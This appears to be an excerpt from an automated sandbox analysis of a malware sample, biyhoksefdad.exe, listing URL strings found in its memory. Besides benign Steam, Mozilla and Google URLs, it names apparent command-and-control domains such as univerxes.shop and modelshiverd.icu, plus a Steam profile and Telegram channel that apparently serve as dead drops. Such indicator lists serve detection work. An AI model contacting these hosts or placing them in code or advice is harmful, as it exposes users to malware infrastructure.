              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=1Vea
              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
              Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=D1VziU1eIKI3&l=englis
              Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
              Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
              Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
              Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
              Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
              Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&
              Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
              Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=oQ1d_VAfa_o
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102C000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
              Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
              Source: biyhoksefdad.exe, 00000000.00000003.1492041549.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://garagedrootz.top/E1o
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: biyhoksefdad.exe, 00000000.00000003.1492041549.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://modelshiverd.icu/
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://modelshiverd.icu/bJhnsj
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://orangemyther.live/IozZ
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
              Source: biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.000000000101B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/u1_
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamloopback.host
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sterpickced.digital/v
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sterpickced.digital/z
              Source: biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: biyhoksefdad.exe, 00000000.00000002.1710644682.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1710644682.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou
              Source: biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: biyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
              Source: biyhoksefdad.exe, 00000000.00000003.1352280152.0000000001013000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352384780.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/kz_prokla2
              Source: biyhoksefdad.exe, biyhoksefdad.exe, 00000000.00000003.1578076106.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1541790012.000000000101E000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1627352228.0000000001020000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1542359493.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/
              Source: biyhoksefdad.exe, 00000000.00000003.1627352228.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/?
              Source: biyhoksefdad.exe, 00000000.00000003.1627352228.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/S
              Source: biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1542359493.000000000102F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/SwnNW
              Source: biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/SwnNW)
              Source: biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/SwnNWcCa
              Source: biyhoksefdad.exe, 00000000.00000003.1443109110.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1446558191.0000000003CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/SwnNWceb
              Source: biyhoksefdad.exe, 00000000.00000003.1627352228.000000000102F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/SwnNWt
              Source: biyhoksefdad.exe, 00000000.00000003.1627352228.000000000102F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/SwnNWv
              Source: biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop/g
              Source: biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://univerxes.shop:443/SwnNWN
              Source: biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
              Source: biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=ccd2df26ae62a59bd6_101925322770
              Source: biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
